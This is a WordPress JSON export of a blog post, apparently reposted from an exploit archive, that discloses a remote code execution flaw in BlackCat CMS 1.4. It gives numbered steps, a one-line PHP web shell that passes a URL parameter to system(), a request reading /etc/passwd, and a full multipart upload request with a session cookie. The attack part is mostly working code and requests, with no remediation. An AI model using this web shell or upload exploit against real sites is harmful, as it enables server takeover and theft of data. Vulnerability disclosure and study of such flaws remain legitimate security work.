{"id":45382,"date":"2023-07-20T23:09:57","date_gmt":"2023-07-20T19:09:57","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/173639\/blackcatcms14-shell.txt"},"modified":"2023-07-23T10:14:25","modified_gmt":"2023-07-23T05:44:25","slug":"blackcat-cms-1-4-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/blackcat-cms-1-4-shell-upload\/","title":{"rendered":"Blackcat CMS 1.4 Shell Upload"},"content":{"rendered":"<p>Exploit Title: Blackcat Cms v1.4 &#8211; Remote Code Execution (RCE)<br \/>\nApplication: blackcat Cms<br \/>\nVersion: v1.4<br \/>\nBugs: RCE<br \/>\nTechnology: PHP<br \/>\nVendor URL: https:\/\/blackcat-cms.org\/<br \/>\nSoftware Link: https:\/\/github.com\/BlackCatDevelopment\/BlackCatCMS<br \/>\nDate of found: 13.07.2023<br \/>\nAuthor: Mirabbas A\u011falarov<br \/>\nTested on: Linux<\/p>\n<p>2. Technical Details &amp; POC<br \/>\n========================================<br \/>\nsteps:<br \/>\n1. login to account as admin<br \/>\n2. go to admin-tools =&gt; jquery plugin (http:\/\/localhost\/BlackCatCMS-1.4\/upload\/backend\/admintools\/tool.php?tool=jquery_plugin_mgr)<br \/>\n3. upload zip file but this zip file must contains poc.php<br \/>\npoc.php file contents<br \/>\n&lt;?php $a=$_GET[&#8216;code&#8217;]; echo system($a);?&gt;<br \/>\n4.Go to http:\/\/localhost\/BlackCatCMS-1.4\/upload\/modules\/lib_jquery\/plugins\/poc\/poc.php?code=cat%20\/etc\/passwd<\/p>\n<p>Poc request<\/p>\n<p>POST \/BlackCatCMS-1.4\/upload\/backend\/admintools\/tool.php?tool=jquery_plugin_mgr HTTP\/1.1<br \/>\nHost: localhost<br \/>\nContent-Length: 577<br \/>\nCache-Control: max-age=0<br \/>\nsec-ch-ua:<br \/>\nsec-ch-ua-mobile: ?0<br \/>\nsec-ch-ua-platform: &#8220;&#8221;<br \/>\nUpgrade-Insecure-Requests: 1<br \/>\nOrigin: http:\/\/localhost<br \/>\nContent-Type: multipart\/form-data; boundary=&#8212;-WebKitFormBoundaryBRByJwW3CUSHOcBT<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.5735.134 Safari\/537.36<br \/>\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7<br \/>\nSec-Fetch-Site: same-origin<br \/>\nSec-Fetch-Mode: navigate<br \/>\nSec-Fetch-User: ?1<br \/>\nSec-Fetch-Dest: document<br \/>\nReferer: http:\/\/localhost\/BlackCatCMS-1.4\/upload\/backend\/admintools\/tool.php?tool=jquery_plugin_mgr<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-US,en;q=0.9<br \/>\nCookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti<br \/>\nConnection: close<\/p>\n<p>&#8212;&#8212;WebKitFormBoundaryBRByJwW3CUSHOcBT<br \/>\nContent-Disposition: form-data; name=&#8221;upload&#8221;<\/p>\n<p>1<br \/>\n&#8212;&#8212;WebKitFormBoundaryBRByJwW3CUSHOcBT<br \/>\nContent-Disposition: form-data; name=&#8221;userfile&#8221;; filename=&#8221;poc.zip&#8221;<br \/>\nContent-Type: application\/zip<\/p>\n<p>PKvalsdalsfapoc.php&lt;?php<br \/>\n$a=$_GET[&#8216;code&#8217;];<br \/>\necho system($a);<br \/>\n?&gt;<br \/>\nblabalaboalpoc.php<br \/>\nblablabla<br \/>\n&#8212;&#8212;WebKitFormBoundaryBRByJwW3CUSHOcBT<br \/>\nContent-Disposition: form-data; name=&#8221;submit&#8221;<\/p>\n<p>Upload<br \/>\n&#8212;&#8212;WebKitFormBoundaryBRByJwW3CUSHOcBT&#8211;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Title: Blackcat Cms v1.4 &#8211; Remote Code Execution (RCE) Application: blackcat Cms Version: v1.4 Bugs: RCE Technology: PHP Vendor URL: https:\/\/blackcat-cms.org\/ Software Link: https:\/\/github.com\/BlackCatDevelopment\/BlackCatCMS Date of found: 13.07.2023 Author: Mirabbas A\u011falarov Tested on: Linux 2. Technical Details &amp; POC ======================================== steps: 1. login to account as admin 2. go to admin-tools =&gt; jquery plugin &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45382","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45382","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45382"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45382\/revisions"}],"predecessor-version":[{"id":45480,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45382\/revisions\/45480"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45382"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=45382"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45382"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}